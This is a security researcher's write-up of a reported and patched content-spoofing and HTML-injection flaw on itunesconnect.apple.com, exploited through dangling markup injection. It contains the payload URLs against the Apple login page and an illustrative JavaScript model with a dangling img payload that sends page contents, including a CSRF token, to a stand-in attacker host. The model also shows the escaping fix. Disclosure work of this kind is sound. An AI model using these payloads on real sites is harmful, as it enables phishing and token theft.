A short story of Content Spoofing to HTML Injection in Apple using Dangling Markup Injection

Content Spoofing is an injection issue in which attacker-controlled input is reflected verbatim into the application's response, so that a legitimate page on a trusted domain displays text the attacker chose. On its own it runs no code, but it is useful in phishing: a link to the real site can be crafted to show a misleading message.

During the recon phase, I found itunesconnect.apple.com, a subdomain of apple.com, and after digging into it I observed that the content of the errorKey parameter was reflected back into the page as shown below.

Payload - https://itunesconnect.apple.com/login?errorKey=This%20message%20can%20be%20changed%20by%20attacker.%20This%20is%20content%20spoofing%20till%20now.%20Let%20try%20to%20exploit%20it%20further.

Content spoofing up to this point

With normal inline Cross Site Scripting (XSS) payloads, the application was giving a blank pop up. After trying different scenarios, I observed that dangling markup injection was possible on the vulnerable parameter (errorKey).

Let’s understand the concept of Dangling Markup Injection

Dangling markup injection is useful where we can't find a way to execute our JavaScript because of input filters, a Content Security Policy, or other obstacles, but we can still inject some HTML tags. The idea is to inject a tag with an unterminated attribute (for example an `<img src="https://attacker-host/?` with no closing quote): the browser keeps reading the rest of the page as part of that attribute value until it reaches the next matching quote, and then sends all of that markup to the attacker-controlled host as part of the URL. This lets an attacker steal the contents of the page (anything that appears after the injection point, such as tokens or form fields) without running any script, using resources such as images to carry the data out.

For our exploitation, I used the CSS @import rule inside a `<style>` tag as the payload. The normal purpose of @import is to pull additional style sheets into a page; here the unterminated import URL plays the role of the dangling attribute.
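To make the mechanism concrete, here is an added example (not code from the original post, and not the itunesconnect.apple.com page, whose real markup is not reproduced here). It models a hypothetical login page that reflects an `errorKey` parameter verbatim, injects the generic `<img src='` form of a dangling markup payload rather than the author's `<style>@import` variant, and mimics how a browser tokenises an unterminated attribute value so you can see exactly which part of the page would be sent to the attacker's host. The hostname `attacker.example`, the CSRF token value and the page layout are all constructed for the example. The same block shows the fix: HTML-escaping the reflected value before it reaches the page.

```javascript
// Added example: a model of verbatim reflection versus escaped reflection,
// and of what a dangling <img src='...> attribute swallows. Everything below
// (page layout, token, hostname) is constructed for illustration.

function escapeHtml(s) {
  return s.replace(/[&<>"']/g, (c) => ({
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;',
  })[c]);
}

// Hypothetical server-side template. With escape=false it reflects errorKey
// as-is (the vulnerable behaviour); with escape=true it encodes it first.
function renderLoginPage(errorKey, { escape = false } = {}) {
  const message = escape ? escapeHtml(errorKey) : errorKey;
  return [
    '<!doctype html><html><body>',
    '<div class="error">' + message + '</div>',
    '<form action="/login" method="post">',
    '<input type="hidden" name="csrf" value="tok-8f1e-CONSTRUCTED">',
    '<input name="user"><input name="pass" type="password">',
    '</form>',
    // The apostrophe in "Don't" is the first single quote after the form,
    // so it is where a single-quoted dangling attribute will stop.
    "<p>Don't have an account? <a href=\"/signup\">Sign up</a></p>",
    '</body></html>',
  ].join('\n');
}

// Simplified model of the HTML tokenizer: after src=<quote> the attribute
// value runs until the next identical quote character, or to end of input
// if there is none. Whatever ends up in that value is what the browser will
// fetch, i.e. what reaches the attacker's server in the request URL.
function firstImgSrc(html) {
  const m = /<img\s+src=(["'])/.exec(html);
  if (!m) return null;
  const quote = m[1];
  const from = m.index + m[0].length;
  const end = html.indexOf(quote, from);
  return end === -1 ? html.slice(from) : html.slice(from, end);
}

// The payload deliberately uses a single quote because the template uses
// double quotes for its own attributes; choosing the quote style the page
// does not use makes the dangling value run as far as possible.
const DANGLING_PAYLOAD = "<img src='https://attacker.example/collect?";

function leakedViaDanglingMarkup(payload, opts) {
  return firstImgSrc(renderLoginPage(payload, opts));
}

// Demo when run directly: shows the leaked fragment, then that escaping
// leaves no <img> tag for the browser to act on.
const leaked = leakedViaDanglingMarkup(DANGLING_PAYLOAD);
console.log('Vulnerable page, URL the browser would request:\n' + leaked);
console.log('Escaped page, first <img src>:', leakedViaDanglingMarkup(DANGLING_PAYLOAD, { escape: true }));
```

The leaked value starts with the attacker's URL and continues through the closing `</div>`, the whole login form including the hidden CSRF token, and stops at the apostrophe in "Don't". In a real browser the request would be sent when the image is fetched, with newlines stripped and the markup percent-encoded, which is why this works even when no script can run. With escaping turned on there is no `<img` in the output at all, so the same payload is rendered as harmless text, which is the fix to apply to any parameter reflected into HTML.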

Time for the final payload. It renders an image (served from a host I control, and shown broken when that host does not answer) wrapped in a link back to itunesconnect.apple.com itself, followed by an injected heading, which demonstrates HTML injection rather than just text reflection.

Payload - https://itunesconnect.apple.com/login?errorKey=%3C%3Cstyle%3E@import%2F%2Fcontent-spoofing-to-possible%20xss%3F%3C---%20Injected%20%3Ca%20href%3Dhttps:%2F%2Fitunesconnect.apple.com%2Flogin%3FerrorKey%3DXSS-NOT-confirmed%3E%3Cimg%20src%3D%22https:%2F%2Fbitenapple.com%2Fmytest.jpeg%22%3E%3C%2Fa%3E%3C%2Fbr%3E%3C%2Fbr%3E%3C%2Fbr%3E%3Ch1%3EVulnerable%20to%20HTML%20Injection%3C%2Fh1%3E

The same payload, URL-decoded, so the injected markup is readable:

<<style>@import//content-spoofing-to-possible xss?<--- Injected <a href=https://itunesconnect.apple.com/login?errorKey=XSS-NOT-confirmed><img src="https://bitenapple.com/mytest.jpeg"></a></br></br></br><h1>Vulnerable to HTML Injection</h1>

Timeline

28th July 2021 - Reported the issue to the Apple Product Security Team.

29th July 2021 - Got a reply from Apple with the Follow-up ID.

14th September 2021 - The issue was patched. Asked the Apple team for an update.

20th September 2021 - The Apple team acknowledged the report and asked for the details to mention on their credit page in the next update cycle. The required details were shared the same day.

22nd September 2021 - Mailed the Apple team for approval to publish a blog post about this issue.

23rd September 2021 - The Apple team wanted to review the post and provide feedback. Replied with the draft blog post.

1st October 2021 - The Apple team gave the go-ahead to publish the blog post.

Senior Security Engineer at @Paytm | Ex- SAFE Security | Acknowledged by Apple, Google, Microsoft etc.| Security always Code rarely